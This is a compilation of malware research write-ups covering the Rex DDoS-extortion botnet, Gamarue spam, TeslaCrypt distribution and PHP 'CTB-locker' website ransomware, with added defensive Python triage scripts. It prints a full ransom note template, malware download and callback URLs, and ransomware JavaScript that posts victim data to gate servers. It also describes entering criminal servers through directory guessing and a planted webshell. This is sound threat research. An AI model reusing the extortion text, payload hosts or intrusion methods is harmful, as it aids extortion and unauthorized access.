All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
Right now we will start 15 minutes attack on your site's IP {{ .IP }}. It will not be hard, we will not crash it at the moment to try to minimize eventual damage, which we want to avoid at this moment. It's just to prove that this is not a hoax. Check your logs!
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

Now, the crooks talk about a 15-minute test DDoS. They ask the victim to check the logs as proof. They want to be taken seriously.
Rex looks like a strange kind of webserver ransomware that doesn’t encrypt files but locks access to the administration page and threatens a DDoS.
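The two ransom templates above are Go text/template files, so every note a victim receives has the same fixed wording with the dynamic fields ({{ .Amount }}, {{ .Address }}, {{ .Step }}, {{ .IP }}, the weekday and date) filled in. As an added illustration (this is not code from the article or from Rex), here is a Python helper a mail gateway or an incident responder could use to recognise such a note and pull those fields out as structured indicators. The demo note, its Bitcoin address, the IP address (203.0.113.10, from a documentation range) and the date are constructed for this example.

```python
import re
from datetime import datetime

# Phrases that stay constant across both templates quoted in the article.
FIXED_PHRASES = [
    "FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY",
    "All your servers will be DDoS-ed starting",
    "price to stop will increase by",
    "This is not a joke.",
    "sometimes over 1 Tbps per second",
    "AND YOU WILL NEVER AGAIN HEAR FROM US!",
    "Bitcoin is anonymous, nobody will ever know you cooperated",
]

# Where the template placeholders end up once the note is rendered.
GROUP_RE = re.compile(r"^We are (?P<group>.+?)\.$", re.MULTILINE)
THREAT_RE = re.compile(
    r"starting (?P<weekday>[A-Za-z]+) \((?P<date>[A-Za-z]{3} \d{1,2} \d{4})\) "
    r"if you don't pay (?P<amount>[0-9.]+) Bitcoins @ "
    r"(?P<address>[13][a-km-zA-HJ-NP-Z1-9]{25,34})"   # base58, no 0/O/I/l
)
STEP_RE = re.compile(r"increase by (?P<step>[0-9.]+) BTC")
IP_RE = re.compile(r"your site's IP (?P<ip>\d{1,3}(?:\.\d{1,3}){3})")


def parse_ransom_note(text):
    """Score how much of the fixed template wording is present and extract the
    variable fields. weekday_consistent flags notes whose stated weekday does
    not match the stated date (a cheap sanity check on the rendered template)."""
    matched = [p for p in FIXED_PHRASES if p in text]
    info = {
        "template_score": round(len(matched) / len(FIXED_PHRASES), 2),
        "group": None, "weekday": None, "date": None, "amount": None,
        "address": None, "step": None, "ip": None, "weekday_consistent": None,
    }
    m = GROUP_RE.search(text)
    if m:
        info["group"] = m.group("group")
    m = THREAT_RE.search(text)
    if m:
        info["weekday"] = m.group("weekday")
        info["amount"] = float(m.group("amount"))
        info["address"] = m.group("address")
        day = datetime.strptime(m.group("date"), "%b %d %Y")   # Go layout "Jan 2 2006"
        info["date"] = day.date().isoformat()
        info["weekday_consistent"] = day.strftime("%A") == info["weekday"]
    m = STEP_RE.search(text)
    if m:
        info["step"] = float(m.group("step"))
    m = IP_RE.search(text)
    if m:
        info["ip"] = m.group("ip")
    info["is_template"] = info["template_score"] >= 0.7 and info["address"] is not None
    return info


# Constructed sample of the second (Anonymous) template, rendered with placeholder values.
DEMO_NOTE = """\
FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE DECISION!
We are Anonymous.
All your servers will be DDoS-ed starting Friday (Oct 21 2016) if you don't pay 5 Bitcoins @ 1ExAmpLeAddReSSfoRtHeDeMo111111111
Right now we will start 15 minutes attack on your site's IP 203.0.113.10. It's just to prove that this is not a hoax. Check your logs!
If you don't pay by Friday, attack will start, price to stop will increase by 1 BTC for every day of attack.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Do not reply, we will probably not read. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.
"""

if __name__ == "__main__":
    for key, value in sorted(parse_ransom_note(DEMO_NOTE).items()):
        print("%-20s %s" % (key, value))
```

The extracted address and amount are what you would hand to a blockchain analyst (as Chainalysis did for the Armada Collective addresses), and the IP field of the newer template tells you which host to watch in the logs for the announced 15-minute test.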

Conclusion

Linux botnets continue to evolve and are becoming very interesting. In this case, what looks at first sight like a Drupal locker is in fact a complete botnet, still in development, with many features.
In the next write-ups we will try to explain each module of this botnet.
As usual, the attack vector is not a 0day but well-known vulnerabilities, so I’ll conclude this article like the others:
If you are a website administrator, DO NOT LEAVE OUT-OF-DATE SERVICES ON THE INTERNET.

Samples:

9070f56651f44ec722e17df67b8a954888e387a8f2574594c80937d0f39c471a  .0LD5dVbuo9
bf211d46551079e7f7646ffd6bfda065f1307ea81508d1625b5c65005d929cb3  .0OHjeERDbv
550b9b4c5b2dbe83fa3e227cca65b9b9768e2ea597c2e109205dba51faee5869  .0OhoU6US1m
677464da2fcf73b9793daca3191501da02957af08a6471a047410ce99ea49405  .0r4mKMUlJ6
69402f4bd7718a3403f1caaaa387edc70b299f6aecc06de39e3a9ac28873a184  .0rqNlrPujv
32c921dd4b755af519f648102098735a569a0326a79a911eb47174bd058e5c43  .0YOtp0GQMk
52bf6ae8fe7a0a59ca8d089444207c173e20a7a11c8b5e815b937e2f4224da4f  .1ZRhWKqTlY
950cd068d9c51b941bdfe4721a3156af15dc408d2df23c1f2bc41b87159b109e  .3v0UwARWmv
1f4d876b17a6d786aa793b9c529235f9f9e164d70a74d8d26ca850d18f1329a7  .3weUyhjJZe
09f1967e97a97a1d0963a84823fa2611b9555866f09d7a04bb69bc4d877f9631  .42wVPcdaFD
3e4cebd60a1d6a6b29bac68ace2547c2e3894a0e5865dd90aff5764f8e7dc16d  .4JkeqTzZSX
dcd0e1586630bc8c50fe600899bee76b853057fd9158ed541d7ddec53c8f2186  .5Ygi9nGrHn
cb42573e36fb148bc1109229a1025cdcb375c166361605f0681da9e54e3ef81d  .5ZFxAbOeBY
08ab4abd017568142d061ffd5a2592a491730dddb4485211fda53f39d43e3efb  .7RCBTpSOUh
ac36c87cacbe1b8327fae3084ebd1740a3a5c6c6f208c1c77da56932a9ca3be6  .7tsPagH3FM
d67ae5639618a3409711377e124ef2c6293200aa3026b8b2996654db63645481  .9bKas738kc
a1610e735042ce0197859e6fd7772039e63efce78d6c9cf642492d1c8f1d7540  .9G97ZhwNer
07dd2c7be7a0becb178967c43684c1a687deb217e87575d18fd6b73dc988bd78  .9MgvdLBtL0
dbc3f96fcbbfd90f877dc11fcdedca1c1e574b951ac70edc3160ed9f389c3fd3  .aH7HRrz554
8e7eaed42f50c865f72f7351b87a988de5aa94781b4dab4ddbe993872435f293  .bM04ITZnuq
97c1ed3d52d663f9bad2eef716169f06053dc2bcf8e3d857b0a702e8fae546c9  .C91EZKVz6Q
a1000d4cb81cfb7dfac660722938f3d9c7cb6e36c33e129097ddd29f3dfd1890  .cOVyPvf01L
9f568df46838872b389628b665940415d897823b2e1804e2625c3dfb0b6850b4  .D90yb8KdDV
cc01ba0825208402b0fc2eb62146e856f69d1e9f53b745d8f068f0d09e6170c0  .E61NBnYjak
40c882738ea1e01cc4e8027dd6ce5d55552e5630c8f65e86db630fca09d85fa9  .EETl2pJOf9
0e6c53797964b611c867cb5e5b492d45edf5472924c9a60a99433240f1712f15  .eLBaxwiu2d
c79d7b2a8caf5cc19a019772053c54d1ec02f8ae15b577bbbbd9bf82f19caedb  .fkmJQOIqYB
d097f55f82e88a32b057010c96f553aa7c8ccef12c2a8484aab0fb3dab9d4a0f  .H4g8bASf8Y
c058d576a108bdcf637a6ed399b4d9a1e3bbb6f194882ffada01b85e79109f65  .HdUykUNGy8
339eaabda43fbf0ee0caa6021a999d383713498911523d2b21e2ee2f1541f78f  .Ju7XqX36yy
3dee377037f7fcfd6539c23bb1cdc6eda46680c8773525b784150c1237788965  .KDnA4yWrGc
9d41dc182dee0690e5c5f08f9276548a85f4b986478fd30ec4208d95d54cffeb  .KzmJO5vHRQ
b30dfa13f8dc7162f3edb43dff8507f82c01bd5bd6e5a1ae2e3b2e55dd6b10c0  .LqZzmAJcjo
f7bc5d56312ae6205b21aa4c72708383716907754b037013f47bc88203fbb450  .Oer60jCsoB
9909910d6e008e15c98d26e214f619a7a82787137158784998d99b5c03cbe8f2  .OiZhEG9cEu
2549560970bb8ebca0136f7d6c8111196295d083c6fd6101a7f9178089502cc0  .q7hsioOPWv
fe2c837d1662ca47ebd86c0cf0a3a382ee589bce6b77dabae30801d71a7d280f  .rG47yPBz5p
67a3b5d1fb946daccd7f3562e35b90537f9032184a0605cc9b8613c91a4ea1be  .RnKtruJM9f
22a578f2d30f316d441b73efbeaa0b53641686d2fa75ad44d4d3992da9ceaf5f  .SzIYofKRTz
0723de24bc86eedde149c53e0f93a18596bed424e823f1b46c2f97e358931b83  .YPuels1RDm
6b46b6eff4be06d47284492fed7f71c53103bfaa610952151bddebb8046a34f1  .yYRSdRs6kH
9bd1d3a567e2036f8e57745dd81333911b06a34f4ed6d7d68daa674aac0d7b96  .Zw64nQ52IX
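Since Rex is always dropped as a hidden file in /tmp with no persistence, a cheap host check is to list hidden regular files in that directory, keep the ones that are ELF binaries, and compare their SHA256 against the sample list above. The following Python script is an added example (not code from the article or from Rex): the directory to scan is a parameter (it would be /tmp on a real host), only a subset of the published hashes is embedded, and the demo directory, its file names and contents are constructed so that the script runs offline.

```python
import hashlib
import os
import tempfile

# SHA256 values taken from the sample list in this article (a subset).
REX_SAMPLE_SHA256 = {
    "9070f56651f44ec722e17df67b8a954888e387a8f2574594c80937d0f39c471a",
    "bf211d46551079e7f7646ffd6bfda065f1307ea81508d1625b5c65005d929cb3",
    "550b9b4c5b2dbe83fa3e227cca65b9b9768e2ea597c2e109205dba51faee5869",
    "9bd1d3a567e2036f8e57745dd81333911b06a34f4ed6d7d68daa674aac0d7b96",
}
ELF_MAGIC = b"\x7fELF"


def sha256_file(path, chunk_size=1 << 20):
    """Hex SHA256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def is_elf(path):
    """True when the file starts with the ELF magic bytes."""
    with open(path, "rb") as fh:
        return fh.read(len(ELF_MAGIC)) == ELF_MAGIC


def hidden_elf_files(directory):
    """Dot-prefixed regular files (not symlinks) in `directory` that are ELF binaries."""
    found = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if (name.startswith(".") and os.path.isfile(path)
                and not os.path.islink(path) and is_elf(path)):
            found.append(path)
    return found


def triage(directory, known_hashes=REX_SAMPLE_SHA256):
    """Return (path, sha256, known) for every hidden ELF file found.

    `known` is True when the hash is in the published sample list; an unknown
    hidden ELF in /tmp is still worth a look, since no hash list is complete."""
    results = []
    for path in hidden_elf_files(directory):
        digest = sha256_file(path)
        results.append((path, digest, digest in known_hashes))
    return results


def build_demo_dir():
    """Constructed stand-in for /tmp: one hidden ELF-looking file (constructed
    name), one hidden text file and one visible ELF file."""
    root = tempfile.mkdtemp(prefix="rex-demo-")
    with open(os.path.join(root, ".x7Qw9bTs2a"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 61)
    with open(os.path.join(root, ".bash_history"), "w") as fh:
        fh.write("ls -la /tmp\n")
    with open(os.path.join(root, "a.out"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x00" * 16)
    return root


if __name__ == "__main__":
    for path, digest, known in triage(build_demo_dir()):
        print("%s  %s  %s" % ("KNOWN-REX" if known else "UNKNOWN  ", digest, path))
```

On a live host, pair the hash match with the network side described above (outbound TLS on port 5099 to many peers) before concluding, since the hidden-file heuristic alone will also catch legitimate build artefacts.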

 

Gamarue loves malicious JavaScript too

A deep look inside a recent campaign

In the malware ecosystem, some old malware families are able to adapt their propagation methods and continue to successfully infect many users. This is the case of Gamarue (aka Andromeda). I will explain here how this new Gamarue campaign spreads via malicious JavaScript in spam emails.
Early in April, I was poked via Twitter about a spamming campaign in progress:
Yet another piece of malware dropped via emails and malicious JavaScript. The dropped binary is:
https://www.virustotal.com/en/file/6adecfaec434b41ecce9911f00b48e4e8ae6e3e8b9081d59e1b46480e9f7dbfc/analysis/1459790694/.
Emails with a zip archive attached constitute the attack vector. This archive contains a JavaScript file which downloads and executes a payload hosted on the Internet: this payload is good old Gamarue.

Gamarue / Andromeda

Gamarue (or Andromeda) is a well-known modular malware. Basically, Gamarue is a dropper which drops different modules. Since it is easy to develop a new module, Gamarue is loved by crooks.
Don’t worry, this article is not another Gamarue analysis. A lot of great articles are already available: https://blog.avast.com/andromeda-under-the-microscope http://resources.infosecinstitute.com/andromeda-bot-analysis/ http://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis
I’m not a big expert on Gamarue, so I have some difficulty identifying the version of the malware. For those who can help, the C&C communication requests look like:
This template doesn’t match the usual version (https://www.botconf.eu/wp-content/uploads/2015/12/OK-P07-Jose-Esparza-Travelling-to-the-far-side-of-Andromeda-2.pdf)
Here are some of the features of the packer found in this version of Gamarue.

AV detection

The packer tries to detect whether an antivirus is installed on the victim’s computer. To do this, the malware calls ZwQuerySystemInformation with the SystemProcessInformation (0x5) information class to retrieve the process list, and checks for the presence of one of the following processes:

  • dwservice.exe (DrWeb)
  • defenderdaemon.exe (Shadow Defender)
  • spiderui.exe (DrWeb)
  • spidernt.exe (DrWeb)

 

VM detection

The Gamarue packer tries to determine whether it is running in a virtual environment by checking (as for AV detection) whether some processes are running:

  • vmacthlp.exe (VMWare)
  • vboxservice.exe (Virtual Box)
  • vboxtray.exe (Virtual Box)

It also attempts to load some DLLs to detect whether it is running in a virtualized environment:

  • VBoxHook.dll (Virtual Box)
  • VBoxMRXNP.dll (Virtual Box)

And finally, it checks if the VMWare tools directory exists:

  • C:\program files\VMware\VMware Tools

 

Anti-analysis

To complicate dynamic analysis, the packer looks for some analysis tool processes:
– taskmgr.exe (the built-in Windows task manager)
– procmon.exe (Process Monitor)
It also enumerates all window titles and looks for the following strings:
– HTTP Analyzer
– Sysinternals
– capturing from Wireshark
– TCPViewClass TCPView
– task manager
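The three checks above (AV processes, VM processes/DLLs/paths, analysis tool processes and window titles) all rest on string comparisons, so the literal strings have to be somewhere in the unpacked packer code. As an added example (not code from the article or from Gamarue), here is a Python script that looks for those exact indicators in a file's bytes, in both ASCII and UTF-16LE, since Windows binaries store strings in either form, and groups the hits by the category the article describes. The sample blob at the bottom is constructed for the demo; on a real case you would point scan_file() at the unpacked sample or a memory dump.

```python
# Indicator strings listed in the article, grouped by the check they belong to.
INDICATORS = {
    "av_process": ["dwservice.exe", "defenderdaemon.exe", "spiderui.exe", "spidernt.exe"],
    "vm_process": ["vmacthlp.exe", "vboxservice.exe", "vboxtray.exe"],
    "vm_dll": ["VBoxHook.dll", "VBoxMRXNP.dll"],
    "vm_path": ["C:\\program files\\VMware\\VMware Tools"],
    "analysis_process": ["taskmgr.exe", "procmon.exe"],
    "window_title": ["HTTP Analyzer", "Sysinternals", "capturing from Wireshark",
                     "TCPViewClass", "TCPView", "task manager"],
}


def _encodings(s):
    """The two byte forms a Windows binary normally uses for a string."""
    return {"ascii": s.encode("ascii"), "utf16le": s.encode("utf-16-le")}


def scan_bytes(data, indicators=INDICATORS):
    """Case-insensitive search of `data` for each indicator in both encodings.
    Returns {category: [(indicator, encoding), ...]} for categories with hits."""
    hay = data.lower()          # lower-cases ASCII letters, which covers UTF-16LE too
    hits = {}
    for category, strings in indicators.items():
        for s in strings:
            for enc_name, needle in _encodings(s.lower()).items():
                if needle in hay:
                    hits.setdefault(category, []).append((s, enc_name))
    return hits


def scan_file(path):
    with open(path, "rb") as fh:
        return scan_bytes(fh.read())


def evasion_score(hits):
    """Number of indicator categories present; two or more is a strong sign that
    the packer's AV/VM/analysis checks are compiled into the sample."""
    return len(hits)


def build_demo_blob():
    """Constructed stand-in for a packed sample: a few indicators in the
    encodings a real binary would use, surrounded by unrelated filler."""
    return b"".join([
        b"MZ" + b"\x90" * 32,
        "vboxservice.exe".encode("utf-16-le"), b"\x00" * 8,
        b"capturing from Wireshark", b"\x00" * 8,
        "C:\\program files\\VMware\\VMware Tools".encode("utf-16-le"), b"\x00" * 8,
        b"kernel32.dll GetProcAddress LoadLibraryA",
    ])


if __name__ == "__main__":
    found = scan_bytes(build_demo_blob())
    print("evasion score:", evasion_score(found))
    for category, entries in sorted(found.items()):
        for indicator, enc in entries:
            print("%-17s %-40s (%s)" % (category, indicator, enc))
```

The same table converts directly into a YARA rule (one `wide ascii nocase` string per indicator), which is the more usual way to ship this kind of check to a sandbox or an EDR.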

After the unpacking process, Gamarue launches C:\windows\system32\lsass.exe (either with CreateProcess or WMI) and injects a rogue DLL into the process.
This DLL is used to communicate with the C&C and drops all 3 modules:

  • Pony, a well-known stealer. This module steals sensitive data like FTP credentials, bitcoin wallets, browser credentials…
  • Hioles, a malware that acts as a proxy on the victim’s computer in order to steal webmail information (Hotmail credentials, for example).
  • A mail spammer.

To better understand this campaign, we need to gather some information around this sample. To do that, we need to take a look inside the C&C server to find something useful.

Data exploration

I tried to grab useful data by “guessing” on the C&C web server found inside the original binary: I tried to find available subdirectories and maybe a directory with the “directory listing” option enabled. After some guessing, I was able to identify some interesting content inside the C&C web server:

Stolen Data

In two different directories, I found a lot of text files which contain stolen data. These data are related to email accounts and look like data exfiltrated by Hioles.

Pony panel

As seen in the original sample, a Pony module is used. I found the control panel of the module in a subdirectory of the web server.
You can find a lot of information on the Internet about Pony: http://www.xylibox.com/2013/05/pony-19-win32fareit.html
As we can see here, the attacker is running a malware campaign to grab stolen credentials.

ProxyCB Control panel

In another directory of the web server, I found a PCB control panel. PCB is used to manage a botnet of proxies. You can find more information at https://www.virusbulletin.com/virusbulletin/2014/03/proxycb-spam-proxy-under-radar
Some screenshots inside the control panel:

JavaScript obfuscation script

In the root directory of the C&C, I was able to find a PHP page which displays obfuscated JavaScript in a text area:
This page may serve ‘debugging’ purposes: a different script is generated each time the web page is refreshed.
Since this JavaScript is the same as the malicious attachment originally received by email, it must be related to the JavaScript payload obfuscation; we are on the right track…

The spam kit source code

Finally, I found a browsable directory that contains all I need to understand how this Gamarue campaign works.
The archives 1/5.rar and nnn.rar contain a huge database of email addresses to spam.
sendmail.rar is the source code of the spamming kit.
The other text files (.txt extension) are part of the spamming kit.
Let’s analyze the spamming kit inside sendmail.rar.
Let’s have a look at the binaries:

  • KWK.exe

It is a piece of software used to generate keywords (http://newox.ru/kwk.php). We can imagine that this software generates the keywords used to craft random emails for the spamming campaign.

  • VPSProxy.exe

VPSProxy is a piece of software created to manage a list of proxies. These proxies are infected websites (CMS). The attackers upload a malicious PHP script on the compromised CMS servers and use them as proxies. It is really useful to stay hidden when you are a crook :).
The PHP source code of the script uploaded on compromised host can be found at: https://pastebin.com/4kXhLtGh
In the archive sendmail.rar, VPSProxy is configured with a list of 179 compromised hosts.
I was not able to find the binary in charge of sending spam, unlike in the TeslaCrypt case (https://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/). It seems that this spamming process is different.
I looked inside the other files of sendmail.rar and found the source code of the spamming kit, from JavaScript obfuscation to mail sending.
For those who are interested, I put the readme on pastebin (https://pastebin.com/UWFR77C9).
The whole kit works around the file send.php.
First, the script checks whether the « jscode » option is enabled. If so, it loads another script: jscode.php.
jscode.php is the script in charge of the JavaScript obfuscation.
It takes the clean JavaScript code as input. In this case, it is a JavaScript script in charge of downloading 3 binaries, copying them into the %TEMP% directory and executing them, a classic scheme in recent months. This JavaScript is obfuscated through random string generation.
After obfuscation, let’s go back to send.php. The script crafts random emails based on information found in all the txt files (sender email, subject, message, etc.).
For example:

  • The email template
  • The subject template
  • A list of fake names
  • A list of fake source email addresses
To send spam, the script does not use compromised SMTP servers as TeslaCrypt does (https://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/). This time, the script uses a list of compromised websites on which the attacker has uploaded a malicious PHP script. The kit contains a list of 14179 compromised hosts (the vast majority are WordPress websites).
The malicious script used to send mail (via the PHP mail() function) is available at: https://pastebin.com/8W6FXnZz.
Finally, online, this spamming kit looks like this:
In sendmail.rar we can also find a standalone PHP script, update.php, used to automatically deploy the spamming kit.
We now have all the information needed to follow this campaign closely with free tools like malwr.com (looking for recently submitted ‘.zip’ files):

Conclusion

Yet another malware campaign with malicious JavaScript and compromised CMS.
Abandoned WordPress sites are a real security problem. Administrators leave old WordPress websites online for several years. Given the number of vulnerabilities in WordPress plugins, it becomes very easy to build a list of several thousand compromised WordPress sites. Every recent malware campaign has involved old WordPress sites (Locky, Dridex, TeslaCrypt and now Gamarue…).
I’m really fed up with this situation but there is no real solution.
As a reminder, to protect the endpoint, you can change the default program used to open ‘.js’ files to notepad.exe instead of wscript.exe. This prevents a script from being executed by a user who opens it by mistake.
Some points in conclusion:

  • DO NOT OPEN UNKNOWN EMAILS.
  • A JavaScript file is NEVER (NE-VER) USED as a format for an invoice (NEVER, REALLY!)!
  • If you are a website administrator, DO NOT LEAVE OLD WORDPRESS SITES ON THE INTERNET.
  • And, if you are a crook, allowing directory listing on your web server is really a good idea, for the investigation.

I would like to thank @F_kZ_ @dvk01uk @JAMESWT_MHT @Techhelplistcom @MalwareTechBlog @malwrhunterteam and @malwaremustdie for their help during this investigation.

Let’s ride with TeslaCrypt

As you can see, we have been working on ransomware over the past few days. This time, we are talking about TeslaCrypt.
TeslaCrypt is a ransomware spread by e-mails or exploit kits. It encrypts your files and asks you to pay in order to retrieve the decryption key. The current version is 3.0. Many analyses are already available on the Internet.
In this article we are focusing on two aspects of TeslaCrypt:
– The attack vector
– The web callback

Attack Vector – Bombila

Early in February 2016, Xylitol added an unknown panel to cybercrime-tracker.
After some research, we have found a binary file hosted on the server at the following address: hxxp://78.47.198.134/1.exe.
https://www.virustotal.com/en/file/6aa5fd384fbfe271a5000397e2e0c9d9e06dd5d041488e4f2de7ae3a4eb1589d/analysis/
This binary file is a spam bot. It uses a list of compromised SMTP servers contained in the file hxxp://78.47.198.134/header/m.txt.
This file (781 MB) contains around 4000 compromised SMTP accounts (Orange, SFR, Telefonica, Yahoo, Gmail, etc.).
After that, the binary file retrieves a list of e-mails from hxxp://78.47.198.134/go_mails/botid-*****.txt.
Directory listing was enabled on this directory, so we could find 139 text files holding 792 256 e-mail addresses.
The spam bot also retrieves some text for crafting e-mails from several files in hXXp://78.47.198.134/header/. For example, some fake names (https://pastebin.com/3Xnn7krB) and random text like:
Finally, the bot retrieves malicious attachments from the directory hXXp://78.47.198.134/go_attach/*****.zip. 200 zip files are waiting in this directory.
These zip files contain malicious JavaScript droppers, each one dropping the TeslaCrypt ransomware.
Everyone has seen this type of attachment in their mailbox over the last few months.
Here is an example of these malicious droppers: https://www.virustotal.com/en/file/5acfac853e4ad0280be2bd44e4afb79d16cc7f5b4fd6ef45dde0007104f92c42/analysis/ https://pastebin.com/0jzGQdYe
This JS drops the malicious (TeslaCrypt) binary file from:
hXXp://helloguysqq.su/85.exe
hXXp://sowhatsupwithitff.com/85.exe
These servers are known for spreading the TeslaCrypt ransomware: https://www.virustotal.com/en/domain/sowhatsupwithitff.com/information/
When spamming, the binary file writes a lot of logs on the infected machine, such as:
And now let’s go to the funny part. After some guessing, we found an archive at hxxp://78.47.198.134/1.zip. This zip file (size: 468 MB compressed, 2 GB decompressed) is a full backup of the server. It contains all the files of this spamming server: source code, logs, payloads, etc.
For example, the source code of the spammer bot callback: https://pastebin.com/b9VWb5bk or index.php: https://pastebin.com/Tkh3UGfE.
This archive also contains 45 million e-mails in different text files.
This overview gives us a better understanding of how the TeslaCrypt ransomware is spread. We can suppose that the crooks running the spam campaigns are different from the ones who manage the ransomware.
I would like to thank the CERT Orange for their work and MalwareMustDie for their support.

TeslaCrypt – Web callback

Now, let’s talk about a poorly documented part of the ransomware: the web callback.
When a machine is infected by TeslaCrypt, the malware sends some data to a web callback on a compromised server. For example:
hxxp://biocarbon\.com.ec/wp-content/uploads/bstr.php
hxxp://imagescroll\.com/cgi-bin/Templates/bstr.php
hxxp://music.mbsaeger\.com/music/Glee/bstr.php
hxxp://stacon\.eu/bstr.php
hxxp://surrogacyandadoption\.com/bstr.php
hxxp://worldisonefamily\.info/zz/libraries/bstr.php
(thanks to @techhelplist https://www.virustotal.com/en/user/techhelplist/ )
This callback is just a gateway to the real C&C hosted on TOR.
The source code of such a callback is available at: https://pastebin.com/d7CvSpF0
Firstly, the page kicks IP addresses belonging to Microsoft:
After that, the callback creates a file named most.txt and logs all data received from infected machines into this file.
This file looks like:
These data are also sent to three TOR callbacks:

http://dd7bsndhr45nfksdnkferfer.javakale.at/

In the TeslaCrypt web kit, we can see another file named « cron.php » (source code available at: https://pastebin.com/LmtPT24L).
The code compares three variables, $_REQUEST['password'], $_REQUEST['re_password'] and $_REQUEST['login']. The aim of this code is still unclear.
This information is perfect for following the infection rate of TeslaCrypt. After grabbing the most.txt file from different callbacks, we were able to compute some statistics on a small part of this campaign:
– We retrieved 30 210 raw records
– 15 290 unique IP addresses (due to NAT, one IP address can correspond to several infected machines)
– 40 TOR exit nodes :)
We can see that the most affected countries are the Republic of Korea and Turkey. The full statistics are available at https://pastebin.com/rpguyaZm.

Conclusion

We looked at another face of the TeslaCrypt infection: the attack vector and the web part. Both were interesting to analyse.
These data are always interesting for estimating the infection rate of a campaign. The logged files show us that the infection rate is quite high; ransomware is definitely a lucrative business.
The web part of ransomware is often forgotten; with different articles we will try to better understand the whole picture.

A lockpicking exercise

A malware calling itself « CTB-locker » has been spreading over some websites since the 12th of February 2016. This campaign is different from classical ransomware attacks, which focus only on workstations: at first sight, CTB-locker also seems to target websites in order to encrypt all the files located on the server.
I found this campaign by accident. During an investigation, I retrieved a malicious binary file from hXXp://www.klingenberg.it/IMG0503405025-JPG.scr. In order to understand the context, I visited the homepage of this server and landed on this rather scary page:
The ‘Decrypt’ button leads to a page offering to decrypt two of the lost files for free:
If the website administrator is worried, a chat with the crooks is even possible!
I was not aware that CTB-Locker was also attacking websites?! It was time for further investigation.
With the help of some search engines, I was able to find a lot of websites with the same homepage:
It seems that an attack was ongoing. To help, you can find a list of these websites on Pastebin: http://pastebin.com/UyXFSL3M
Quickly, I was able to find 102 websites infected by this « CTB-Locker ».
The JavaScript in their homepage (index.php) explains something interesting:


admins = ["http://erdeni.ru/access.php", "http://studiogreystar.com/access.php", "http://a1hose.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
$.post(admins[iadmin], postdata+"domain="+domain, function (data) {
[..]

$('#decrypt').click(function() {
post_admin("decrypt=", function(data) {
[...]


$('#dectest').click(function() {
post_admin("dectest=secret="+($("#secret").val()), function(data) {
[...]


$('#sendmsg').click(function() {
msg = "msg=" + encodeURIComponent($("#chatmsg").val());
post_admin("sendmsg=secret="+$("#secret").val()+msg, function(data) {
[...]


$('#recvmsg').click(function() {
post_admin("recvmsg=secret="+$("#secret").val(), function(data) {
[...]

As we can see, POST requests are sent to other second-level servers, which we will call “gates”, in order to decrypt the files:
admins = ["http://erdeni.ru/access.php", "http://studiogreystar.com/access.php", "http://a1hose.com/access.php"];

I compiled a list of gate servers from the infected websites on Pastebin as well: http://pastebin.com/E9NcvL4v
Even if it is not confirmed, we can suppose that this ransomware works in this way:
So, it’s time for my favorite game: finding a sample.
The original victim server, klingenberg.it, seems to be a good starting point: this server should be full of vulnerabilities since it hosts malware like the CTB-Locker ransomware.
After some research, I found an unprotected webshell already running on the server:
Thanks to this webshell, it is really easy to grab the files related to CTB-Locker. And now I’m sure: this ransomware uses only PHP scripts.
First, let’s have a look at the root index.php file (available at http://pastebin.com/vdBrtrt3 ).
This ransomware is composed of several files:
A directory named « Crypt » containing a bunch of self-explanatory PHP scripts:
– AES.php
– Base.php
– BigInteger.php
– Hash.php
– Random.php
– Rijndael.php
Along with the index.php main page, other files are relevant to this ransomware: allenc.txt, test.txt, victims.txt, extensions.txt, temp, robots.txt and secret_XXXXX.txt.

The encryption process starts when a malicious user generates a specially-crafted POST request to the index.php page:
encrypt_files($victims, $_POST['submit'], $_POST['submit2']);
The function enc_excluded in index.php excludes the ransomware’s own core files (just to be sure the malware will not encrypt itself!).
The list of files to encrypt is computed by the function get_files. Directories are recursively crawled and the list of files to encrypt (with AES-256) is written to the file named victims.txt.
The files are chosen based on their extension. The list of extensions to keep is contained in the file extensions.txt:
This list of files is then sent to the function encrypt_files. This function selects two files in this list and writes them to test.txt.
These two files are encrypted by a first key (“submit” variable in the POST request) and can be decrypted for free using the feature “We give you the opportunity to decipher 2 files free!”.
The other files are encrypted with another key (“submit2” variable in the POST request) and this list is written in the file allenc.txt.
In order to uniquely identify the infected server, the ransomware uses a secret computed as 10 characters of the MD5 hash of the string “djf33” + hostname, starting at offset 2 (e.g. md5(“djf33www.klingenberg.it”)):

$secret = substr(md5("djf33".cur_domain), 2, 10);
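The file names above (the « Crypt » directory with its six PHP libraries, allenc.txt, test.txt, victims.txt, extensions.txt and secret_XXXXX.txt) together with the secret derivation give a responder everything needed to triage a document root and to tie a secret file back to the hostname it was generated for. The following Python script is an added example (not code from the article or from the ransomware): it re-implements the PHP substr(md5("djf33" . $host), 2, 10) computation and checks a directory for the listed artefacts. The demo document root, its files and the hostnames used are constructed.

```python
import hashlib
import os
import tempfile

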